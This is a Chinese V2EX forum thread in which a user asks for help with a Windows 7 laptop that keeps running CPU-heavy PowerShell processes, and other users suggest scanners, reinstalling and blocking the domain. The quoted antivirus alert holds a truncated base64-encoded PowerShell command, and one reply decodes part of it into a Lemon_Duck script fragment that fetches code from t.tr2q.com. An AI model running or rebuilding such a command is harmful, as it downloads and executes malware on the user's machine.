V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
devwolf
V2EX  ›  问与答

昨天发现的, win7 被一堆“cmd 发起的 powershell”在后台疯狂占 cpu

  •  
  •   devwolf · 2019-12-31 09:15:55 +08:00 · 3016 次点击
    这是一个创建于 1799 天前的主题,其中的信息可能已经有所发展或是发生改变。

    毒霸是这样说的:“可疑程序运行后,可能会静默安装恶意软件,导致系统异常,建议您立即阻止。 行为发起 :C:\Windows\system32\cmd.EXE 可疑进程 :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 可疑内容 :powershell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ”

    去金山那边查查,10 月份就有人反映了,但看起来是没解决 http://bbs.duba.net/thread-4191273570-1-1.html

    相关的科普查了一下这个 https://www.freebuf.com/articles/network/216918.html 和这篇文中描述很像,一小时一次。

    ——当然,最快的法子是重装系统,但因为要搬数据,索性换电脑了(从小新 pro13 加到了联想拯救者然后跌回惠普星系列,上报时被主管强推硬是改成了戴尔游匣)。
    3 号才到,旧笔记本还得撑一会儿,想让旧笔记本死个明白,求告知解决方案

    目前已经试过的法子:照着网上能搜到的禁用 powershell 的法子,将所有人替换为了 admin,拿掉了 system 的权限,但还是时间一到,毒霸提示"cmd 又把 powshell 放出来吃 cpu 了"

    12 条回复    2019-12-31 16:34:45 +08:00
    BFDZ
        1
    BFDZ  
       2019-12-31 09:25:10 +08:00
    进安全模式,用大蜘蛛扫描器全盘扫一遍
    http://download.geo.drweb.com/pub/drweb/cureit/cureit.exe
    w292614191
        2
    w292614191  
       2019-12-31 09:54:22 +08:00
    到 ‘我告诉你’ 去下载个系统?

    不要使用 ‘番茄家园、雨林木风、老毛桃。。。。。。’
    rssf
        3
    rssf  
       2019-12-31 09:57:06 +08:00 via iPhone
    毒霸自己不就是个占用系统资源的病毒
    dxgundam01
        4
    dxgundam01  
       2019-12-31 09:58:54 +08:00
    明显就是中毒啦,感觉重装啊
    devwolf
        5
    devwolf  
    OP
       2019-12-31 10:03:57 +08:00
    楼上说的没错——
    因为公司网速问题,大蜘蛛还没下好,先下了同事推荐的火绒。结果火绒一查,毒霸自己就是个开后门的二五仔,过会儿看看解决没
    zhuangku556
        6
    zhuangku556  
       2019-12-31 10:09:15 +08:00   ❤️ 1
    还敢用金山系软件啊。。。
    devwolf
        7
    devwolf  
    OP
       2019-12-31 10:56:07 +08:00
    https://www.landiannews.com/archives/67551.html
    竟然是这个月 6 号的消息,还挺新的,解释了上面 5 楼 发现火绒能抓到金山这些后门。
    6 楼 提到的也是,单纯因为之前那么多问题只要没轮到自己头上,就没换、关心的也少,
    。。。笔者本身是挺缺少防患于未然的意识。
    jin7
        8
    jin7  
       2019-12-31 14:04:31 +08:00
    用 win10 自带的杀毒就保平安
    Buges
        9
    Buges  
       2019-12-31 14:45:54 +08:00 via Android   ❤️ 1
    $ echo JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ | base64 -d

    $ L e m o n _ D u c k = ' l D C Q h Z t ' ; $ y = ' h t t p : / / t . t r 2 q . c o m / v . j s ' ; $ z = $ y + ' p ' + ' ? m i g _ 2 0 1 9 1 2 3 0 ' ; $ m = ( N e w - O b j base64:
    invalid input
    Buges
        10
    Buges  
       2019-12-31 14:47:08 +08:00 via Android
    可以先把 t.tr2q.com 加到 hosts
    devwolf
        11
    devwolf  
    OP
       2019-12-31 16:27:23 +08:00
    感谢大伙儿的热情相助。
    所幸,笔者这边试着用火绒干掉一些扫出的病毒后,看上去是没再出现 powershell 了。姑且记作一个 win7 出现该问题的解决办法吧。
    关于 8 楼 提到的,肯定的,下个新电脑笔者老老实实用 win10 了。

    最后,祝各位元旦快乐。
    cutlove
        12
    cutlove  
       2019-12-31 16:34:45 +08:00
    火绒再得一分
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1082 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 19:14 · PVG 03:14 · LAX 11:14 · JFK 14:14
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.